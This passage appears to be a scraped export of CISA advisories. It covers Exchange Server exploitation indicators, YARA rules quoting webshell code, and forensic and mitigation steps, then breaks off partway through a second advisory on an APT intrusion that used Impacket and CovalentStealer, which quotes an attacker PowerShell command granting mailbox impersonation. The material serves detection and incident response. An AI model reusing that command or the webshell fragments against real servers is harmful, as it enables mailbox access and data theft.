definitive IOCs:\n\n * `POST /owa/auth/Current/`\n * `POST /ecp/default.flt`\n * `POST /ecp/main.css`\n * `POST /ecp/<single char>.js`\n\nVolexity has seen attackers leverage the following IP addresses. Although these are tied to virtual private servers (VPSs) servers and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly:\n\n * `103.77.192[.]219`\n * `104.140.114[.]110`\n * `104.250.191[.]110`\n * `108.61.246[.]56`\n * `149.28.14[.]163`\n * `157.230.221[.]198`\n * `167.99.168[.]251`\n * `185.250.151[.]72`\n * `192.81.208[.]169`\n * `203.160.69[.]66`\n * `211.56.98[.]146`\n * `5.254.43[.]18`\n * `5.2.69[.]14`\n * `80.92.205[.]81`\n * `91.192.103[.]43`\n\nVolexity has also provided the following YARA signatures that can be run within your network to assist in finding signs of a compromise.\n\nrule webshell_aspx_simpleseesharp : Webshell Unclassified \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"A simple ASPX Webshell that allows an attacker to write further files to disk.\" \nhash = \"893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2\" \n \nstrings: \n$header = \"<%@ Page Language=\\\"C#\\\" %>\" \n$body = \"<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine\" \n \ncondition: \n$header at 0 and \n$body and \nfilesize < 1KB \n} \n \nrule webshell_aspx_reGeorgTunnel : Webshell Commodity \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"A variation on the reGeorg tunnel webshell\" \nhash = \"406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928\" \nreference = \"https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx\" \n \nstrings: \n$s1 = \"System.Net.Sockets\" \n$s2 = \"System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get\" \n// a bit more experimental \n$t1 = \".Split(\u2018|\u2019)\" \n$t2 = \"Request.Headers.Get\" \n$t3 = \".Substring(\" \n$t4 = \"new Socket(\" \n$t5 = \"IPAddress ip;\" \n \ncondition: \nall of ($s*) or \nall of ($t*) \n} \n \nrule webshell_aspx_sportsball : Webshell Unclassified \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"The SPORTSBALL webshell allows attackers to upload files or execute commands on the system.\" \nhash = \"2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a\" \n \nstrings: \n$uniq1 = \"HttpCookie newcook = new HttpCookie(\\\"fqrspt\\\", HttpContext.Current.Request.Form\" \n$uniq2 = \"ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE=\" \n \n$var1 = \"Result.InnerText = string.Empty;\" \n$var2 = \"newcook.Expires = DateTime.Now.AddDays(\" \n$var3 = \"System.Diagnostics.Process process = new System.Diagnostics.Process();\" \n$var4 = \"process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\\\"\" \n$var5 = \"else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\\\"\" \n$var6 = \"<input type=\\\"submit\\\" value=\\\"Upload\\\" />\" \n \ncondition: \nany of ($uniq*) or \nall of ($var*) \n}\n\nA list of webshell hashes have also been provided by Microsoft:\n\n * `b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0`\n * `097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e`\n * `2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1`\n * `65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5`\n * `511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1`\n * `4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea`\n * `811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d`\n * `1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944`\n\n**Note:** this is not an all-inclusive list of indicators of compromise and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within your network traffic, may nevertheless have been compromised. CISA recommends following the guidance located in the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to check your servers for any signs of a compromise. \n\n### Conduct Forensic Analysis\n\nShould your organization see evidence of compromise, your incident response should begin with conducting forensic analysis to collect artifacts and perform triage. Please see the following list of recommendations on how to conduct forensic analysis using various tools.\n\nAlthough the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics.\n\nWhile collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and that minimize impact to the operating system itself.\n\nIdeally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media.\n\nKey artifacts for triage that should be collected:\n\n * Memory\n * All registry hives\n * All windows event logs\n * All web logs\n\nMemory can be collected with a variety of open source tools (e.g., FTK Imager by AccessData, Ram Capture by Belkasoft).\n\nRegistry and Windows Event logs can be collected with a variety of open source tools as well (e.g., FTK_Imager, Kroll Artifact Parser And Extractor [KAPE]).\n\nWeb logs can also be collected with a variety of open source tools (e.g., FTK Imager).\n\n#### **Windows Artifact Collection Guide**\n\nExecute the following steps in order.\n\n**1) Download the latest FTK Imager** from <https://accessdata.com/product-download/>.\n\n * **Note:** Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product\u2019s User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\n**2) Collect memory from live system using FTK Imager.** See Memory Capture with FTK Imager.pdf for instructions. Note: Download and copy \u201cFTK Imager\u201d folder to an external drive. Run FTK Imager.exe from the FTK Imager folder from external drive. Wait until memory collect is complete before proceeding to step 2.\n\n**3) Collect important system artifacts using KAPE.** See KAPE Collection Procedure. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from external drive.\n\n**4) Collect disk image using FTK Imager. **See Live Image with FTK Imager.pdf for instructions. **Note:** Run FTK Imager.exe from the \u201cFTK Imager\u201d folder from external drive.\n\n#### **Memory Capture with FTK Imager**\n\n**1) Open FTK Imager.** Log into the system with Administrator privileges and launch \u201cFTK Imager.\u201d\n\n * **Note:** Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\n**2) Open \u201cCapture Memory.\"** Select \u201cCapture Memory\u2026\u201d from the File menu.\n\n![](/sites/default/files/publications/aa21-062-1.png)\n\n_Figure 1: FTK Imager \u2013 Capture Memory Command_\n\n**3) Select Path and Filenames. **On the window that appears, use the \u201cBrowse\u201d button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system. Doing so will prevent the saved file from overwriting any dataspace on the system.\n\n * Name the destination file with a descriptive name (i.e., hostname of the system).\n * Select the box \u201cInclude pagefile\u201d and provide a name of the pagefile that is descriptive of the system.\n * Do not select \u201cCreate AD1 file.\u201d\n\n![](/sites/default/files/publications/aa21-062-2.png)\n\n_Figure 2: FTK Imager \u2013 Memory Capture _\n\n**4) Capture Memory.** Click on \u201cCapture Memory\u201d to begin the capture process. The process will take several minutes depending on the size of the pagefile and the amount of memory on the system.\n\n![](/sites/default/files/publications/aa21-062-3.png)\n\n_Figure 3: FTK Imager \u2013 Capture Process_\n\n#### **KAPE Collection Procedure [[1](<https://ericzimmerman.github.io/KapeDocs/#!Pages%5C2.-Getting-started.md>)]**\n\n1) Download KAPE from <https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape>.\n\n2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict utilization of removable media.\n\n * Enable antivirus and host protection once this process is completed.\n\n3) Unzip Kape.zip and run gkape.exe as admin from your removable media\n\n4) **Target source **should be the drive on which the OS resides, typically C:.\n\n5) **Target destination **should be an external drive folder, not the same drive as the **Target source**. If available, use an external hard drive or flash drive.\n\n * A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB.\n * If you are going to be running KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE.\n\n6) Uncheck **Flush **checkbox (it is checked natively).\n\n7) Check **Add %d** and **Add %m** checkboxes.\n\n8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly.\n\n9) Check **Process VSCs** checkbox.\n\n10) Select **Zip **radio button and add Base name TargetOutput.\n\n11) Ensure **Deduplicate **checkbox is checked (it is checked natively).\n\n * At the bottom you should now see a large Current command line, similar to:\n\n.\\kape.exe --tsource C: --tdest E:\\%d%m --tflush --target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes, McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE, Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord, Dropbox, Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++, OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs, Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs, MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin, VirtualDisks, Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs, EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs, EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles, MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle, RecycleBin, RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB, SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall, WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints --vss --zip TargetOutput \u2013gui\n\n * In the bottom right corner hit the** Execute! **Button.\n * Screenshot below shows `gkape.exe` during execution, you will also see a command window execute. **Note: **KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer there may be an issue.\n\n![](/sites/default/files/publications/aa21-062-4.png)\n\n_Figure 4: gkape.exe screenshot_\n\n### Mitigations\n\nCISA strongly recommends organizations read [Microsoft\u2019s advisory](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [security blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) for more information on how to look for this malicious activity and to apply critical patches as soon as possible.\n\n_(Updated March 4, 2021):_ CISA is aware of threat actors using open source tools to search for vulnerable Microsoft Exchange Servers. This particular type of attack is scriptable, allowing attackers to easily exploit vulnerabilities through automated mechanisms. CISA advises all entities to patch as soon as possible to avoid being compromised. \n\n_(Updated March 4, 2021):_ From [Microsoft's patch release](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), the security updates are available for the following operating systems:\n\n * Exchange Server 2010 (update requires SP 3 or any SP 3 RU \u2013 this is a Defense in Depth update)\n * Exchange Server 2013 (update requires CU 23)\n * Exchange Server 2016 (update requires CU 19 or CU 18)\n * Exchange Server 2019 (update requires CU 8 or CU 7)\n\n_(Updated March 4, 2021):_ If you are running an older CU then what the patch will accept, you must upgrade to at least the required CU as stated above then apply the patch. \n\n_(Updated March 4, 2021):_ All patches must be applied using administrator privileges. \n\n\n_(Updated March 5, 2021)_: If patching is not an immediate option, CISA strongly recommends following alternative mitigations found in [Microsoft\u2019s blog on Exchange Server Vulnerabilities Mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>). However, these options should only be used as a temporary solution, not a replacement for patching. Additionally, there are other mitigation options available. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following:\n\n * Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network.\n * Block external access to on-premises Exchange: \n * Restrict external access to OWA URL: `/owa/`. \n * Restrict external access to Exchange Admin Center (EAC) aka Exchange Control Panel (ECP) URL:` /ecp/`.\n\n * _(Updated March 4, 2021):_ Disconnect vulnerable Exchange servers from the internet until a patch can be applied.\n\nCISA would like to thank Microsoft and Volexity for their contributions to this Alert.\n\n### Resources\n\n * (Updated April 14, 2021) **Microsoft's April 2021 Security Update **that mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.\n * _(Updated March 12, 2021) _[Check my OWA](<https://checkmyowa.unit221b.com/>) tool for checking if a system has been affected. _**Disclaimer:** this tool does not check against an exhaustive list of compromised domains. It is meant for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information and cannot assure its accuracy or completeness; therefore, entities should not rely solely on this information to justify foregoing CISA\u2019s recommendations for action described on this webpage._\n * Microsoft Advisory: <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * Microsoft Security Blog - Hafnium targeting Exchange Servers: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * Volexity Blog: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n * Microsoft\u2019s blog on Exchange Server Vulnerabilities Mitigations: <https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>\n\n### References\n\n[Eric Zimmerman: KAPE Documentation](<https://ericzimmerman.github.io/KapeDocs/#!Pages%5C2.-Getting-started.md>)\n\n[Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities](<https://cyber.dhs.gov/ed/21-02/>)\n\n[Supplemental Direction V1 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities ](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction>)\n\n[Supplemental Direction V2 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>)\n\n### Revisions\n\nMarch 3, 2021: Initial Version|March 4, 2020: Updated Mitigations and Technical Details sections|March 5, 2021: Updated Mitigations Guidance from Microsoft|March 10, 2021: Updated TTP Section|March 12, 2021: Updated Resources Section|March 12, 2021: Added information on DearCry Ransomware |March 13, 2021: Added seven China Chopper Webshell MARs|March 14, 2021: Updated information on DearCry Ransomware|March 16, 2021: Added information on EOMT tool|March 25, 2021: Added two China Chopper Webshell MARs|March 25, 2021: Updated MARs to include YARA Rules|March 31, 2021: Added links to ED 21-02 and ED 21-02 Supplemental Direction|April 12, 2021: Added one China Chopper Webshell MAR and one DearCry Ransomware MAR|April 13, 2021: Added links to Microsoft's April 2021 Security Update and ED 21-02 Supplemental Direction V2|April 14, 2021: Added Exchange Server 2013 to list of on-premises Exchange Servers affected by the vulnerabilities dislcosed on April 13, 2021. |July 19, 2021: Added attribution note\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T12:00:00", "type": "ics", "title": "Mitigate Microsoft Exchange Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-07-19T12:00:00", "id": "AA21-062A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T19:53:41", "description": "### Summary\n\nActions to Help Protect Against APT Cyber Activity:\n\n\u2022 Enforce multifactor authentication (MFA) on all user accounts. \n\u2022 Implement network segmentation to separate network segments based on role and functionality. \n\u2022 Update software, including operating systems, applications, and firmware, on network assets. \n\u2022 Audit account usage.\n\nFrom November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization\u2019s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization\u2019s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim\u2019s sensitive data.\n\nThis joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.\n\nDownload the PDF version of this report: pdf, 692 KB\n\nFor a downloadable copy of IOCs, see the following files:\n\n * [Malware Analysis Report (MAR)-10365227-1.stix, 966 kb](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r1.v1.WHITE_stix_7.xml>)\n * [MAR-10365227-2.stix, 249B](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r2.v1.WHITE_stix.xml>)\n * [MAR-10365227-3.stix, 3.2 MB](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r3.v1.WHITE_stix_0.xml>)\n\n### Technical Details\n\n#### **Threat Actor Activity**\n\n**Note**: _This advisory uses the [MITRE ATT&CK\u00ae for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the APT cyber activity mapped to MITRE ATT&CK for Enterprise framework._\n\nFrom November 2021 through January 2022, CISA conducted an incident response engagement on a DIB Sector organization\u2019s enterprise network. The victim organization also engaged a third-party incident response organization for assistance. During incident response activities, CISA and the trusted \u2013third-party identified APT activity on the victim\u2019s network.\n\nSome APT actors gained initial access to the organization\u2019s Microsoft Exchange Server as early as mid-January 2021. The initial access vector is unknown. Based on log analysis, the actors gathered information about the exchange environment and performed mailbox searches within a four-hour period after gaining access. In the same period, these actors used a compromised administrator account (\u201cAdmin 1\u201d) to access the EWS Application Programming Interface (API). In early February 2021, the actors returned to the network and used Admin 1 to access EWS API again. In both instances, the actors used a virtual private network (VPN).\n\nFour days later, the APT actors used Windows Command Shell over a three-day period to interact with the victim\u2019s network. The actors used Command Shell to learn about the organization\u2019s environment and to collect sensitive data, including sensitive contract-related information from shared drives, for eventual exfiltration. The actors manually collected files using the command-line tool, WinRAR. These files were split into approximately 3MB chunks located on the Microsoft Exchange server within the CU2\\he\\debug directory. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.\n\nDuring the same period, APT actors implanted [Impacket](<https://attack.mitre.org/versions/v11/software/S0357/>), a Python toolkit for programmatically constructing and manipulating network protocols, on another system. The actors used Impacket to attempt to move laterally to another system.\n\nIn early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server. Later in March, APT actors installed HyperBro on the Exchange Server and two other systems. For more information on the HyperBro and webshell samples, see CISA [MAR-10365227-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b>) and [-3](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277c>).\n\nIn April 2021, APT actors used Impacket for network exploitation activities. See the Use of Impacket section for additional information. From late July through mid-October 2021, APT actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate the remaining sensitive files. See the Use of Custom Exfiltration Tool: CovalentStealer section for additional information.\n\nAPT actors maintained access through mid-January 2022, likely by relying on legitimate credentials.\n\n#### **Use of Impacket**\n\nCISA discovered activity indicating the use of two Impacket tools: wmiexec.py and smbexec.py. These tools use Windows Management Instrumentation (WMI) and Server Message Block (SMB) protocol, respectively, for creating a semi-interactive shell with the target device. Through the Command Shell, an Impacket user with credentials can run commands on the remote device using the Windows management protocols required to support an enterprise network.\n\nThe APT cyber actors used existing, compromised credentials with Impacket to access a higher privileged service account used by the organization's multifunctional devices. The threat actors first used the service account to remotely access the organization\u2019s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange:\n\npowershell add-pssnapin *exchange*;New-ManagementRoleAssignment - name:\"Journaling-Logs\" -Role:ApplicationImpersonation -User:<account>\n\nThis command gave the service account the ability to access other users\u2019 mailboxes.\n\nThe APT cyber actors used virtual private network (VPN) and virtual private server (VPS) providers, M247 and SurfShark, as part of their techniques to remotely access the Microsoft Exchange server. Use of these hosting providers, which serves to conceal interaction with victim networks, are common for these threat actors. According to CISA\u2019s analysis of the victim\u2019s Microsoft Exchange server Internet Information Services (IIS) logs, the actors used the account of a former employee to access the EWS. EWS enables access to mailbox items such as email messages, meetings, and contacts. The source IP address for these connections is mostly from the VPS hosting provider, M247.\n\n#### Use of Custom Exfiltration Tool: CovalentStealer\n\nThe threat actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate sensitive files.\n\nCovalentStealer is designed to identify file shares on a system, categorize the files, and upload the files to a remote server. CovalentStealer includes two configurations that specifically target the victim's documents using predetermined files paths and user credentials. CovalentStealer stores the collected files on a Microsoft OneDrive cloud folder, includes a configuration file to specify the types of files to collect at specified times and uses a 256-bit AES key for encryption. See CISA [MAR-10365227-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a>) for additional technical details, including IOCs and detection signatures.\n\n#### MITRE ATT&CK Tactics and Techniques\n\nMITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. CISA uses the ATT&CK Framework as a foundation for the development of specific threat models and methodologies. Table 1 lists the ATT&CK techniques employed by the APT actors.\n\n_Table 1: Identified APT Enterprise ATT&CK Tactics and Techniques_\n\n_Initial Access_ \n \n--- \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization\u2019s multifunctional device domain account used to access the organization\u2019s Microsoft Exchange server via OWA. \n \n_Execution_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nWindows Management Instrumentation\n\n| \n\n[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)\n\n| \n\nActors used Impacket tools wmiexec.py and smbexec.py to leverage Windows Management Instrumentation and execute malicious commands. \n \nCommand and Scripting Interpreter\n\n| \n\n[T1059](<https://attack.mitre.org/versions/v11/techniques/T1059/003/>)\n\n| \n\nActors abused command and script interpreters to execute commands. \n \nCommand and Scripting Interpreter: PowerShell\n\n| \n\n[T1059.001](<https://attack.mitre.org/techniques/T1059/001>)\n\n| \n\nActors abused PowerShell commands and scripts to map shared drives by specifying a path to one location and retrieving the items from another. See Appendix: Windows Command Shell Activity for additional information. \n \nCommand and Scripting Interpreter: Windows Command Shell\n\n| \n\n[T1059.003](<https://attack.mitre.org/versions/v11/techniques/T1059/003/>)\n\n| \n\nActors abused the Windows Command Shell to learn about the organization\u2019s environment and to collect sensitive data. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.\n\nThe actors used Impacket tools, which enable a user with credentials to run commands on the remote device through the Command Shell. \n \nCommand and Scripting Interpreter: Python\n\n| \n\n[T1059.006](<https://attack.mitre.org/versions/v11/techniques/T1059/006/>)\n\n| \n\nThe actors used two Impacket tools: wmiexec.py and smbexec.py. \n \nShared Modules\n\n| \n\n[T1129](<https://attack.mitre.org/techniques/T1129>)\n\n| \n\nActors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. \n \nSystem Services\n\n| \n\n[T1569](<https://attack.mitre.org/versions/v11/techniques/T1569/>)\n\n| \n\nActors abused system services to execute commands or programs on the victim\u2019s network. \n \n_Persistence_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \nCreate or Modify System Process\n\n| \n\n[T1543](<https://attack.mitre.org/versions/v11/techniques/T1543/>)\n\n| \n\nActors were observed creating or modifying system processes. \n \n_Privilege Escalation_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization\u2019s multifunctional device domain account used to access the organization\u2019s Microsoft Exchange server via OWA. \n \n_Defense Evasion_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nMasquerading: Match Legitimate Name or Location\n\n| \n\n[T1036.005](<https://attack.mitre.org/versions/v11/techniques/T1036/005>)\n\n| \n\nActors masqueraded the archive utility WinRAR.exe by renaming it VMware.exe to evade defenses and observation. \n \nIndicator Removal on Host\n\n| \n\n[T1070](<https://attack.mitre.org/versions/v11/techniques/T1070/004/>)\n\n| \n\nActors deleted or modified artifacts generated on a host system to remove evidence of their presence or hinder defenses. \n \nIndicator Removal on Host: File Deletion\n\n| \n\n[T1070.004](<https://attack.mitre.org/versions/v11/techniques/T1070/004/>)\n\n| \n\nActors used the del.exe command with the /f parameter to force the deletion of read-only files with the *.rar and tempg* wildcards. \n \nValid Accounts\n\n| \n\n[T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>)\n\n| \n\nActors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization\u2019s multifunctional device domain account used to access the organization\u2019s Microsoft Exchange server via OWA. \n \nVirtualization/Sandbox Evasion: System Checks\n\n| \n\n[T1497.001](<https://attack.mitre.org/techniques/T1497/001>)\n\n| \n\nActors used Windows command shell commands to detect and avoid virtualization and analysis environments. See Appendix: Windows Command Shell Activity for additional information. \n \nImpair Defenses: Disable or Modify Tools\n\n| \n\n[T1562.001](<https://attack.mitre.org/techniques/T1562/001>)\n\n| \n\nActors used the taskkill command to probably disable security features. CISA was unable to determine which application was associated with the Process ID. \n \nHijack Execution Flow\n\n| \n\n[T1574](<https://attack.mitre.org/versions/v11/techniques/T1574/>)\n\n| \n\nActors were observed using hijack execution flow. \n \n_Discovery_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nSystem Network Configuration Discovery\n\n| \n\n[T1016](<https://attack.mitre.org/techniques/T1016>)\n\n| \n\nActors used the systeminfo command to look for details about the network configurations and settings and determine if the system was a VMware virtual machine.\n\nThe threat actor used route print to display the entries in the local IP routing table. \n \nSystem Network Configuration Discovery: Internet Connection Discovery\n\n| \n\n[T1016.001](<https://attack.mitre.org/techniques/T1016/001>)\n\n| \n\nActors checked for internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways. \n \nSystem Owner/User Discovery\n\n| \n\n[T1033](<https://attack.mitre.org/techniques/T1033>)\n\n| \n\nActors attempted to identify the primary user, currently logged in user, set of users that commonly use a system, or whether a user is actively using the system. \n \nSystem Network Connections Discovery\n\n| \n\n[T1049](<https://attack.mitre.org/techniques/T1049>)\n\n| \n\nActors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP. \n \nProcess Discovery\n\n| \n\n[T1057](<https://attack.mitre.org/techniques/T1057>)\n\n| \n\nActors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine.\n\nThe actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running on the computer matching the string \u201cpowers.\u201d \n \nSystem Information Discovery\n\n| \n\n[T1082](<https://attack.mitre.org/techniques/T1082>)\n\n| \n\nActors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine. \n 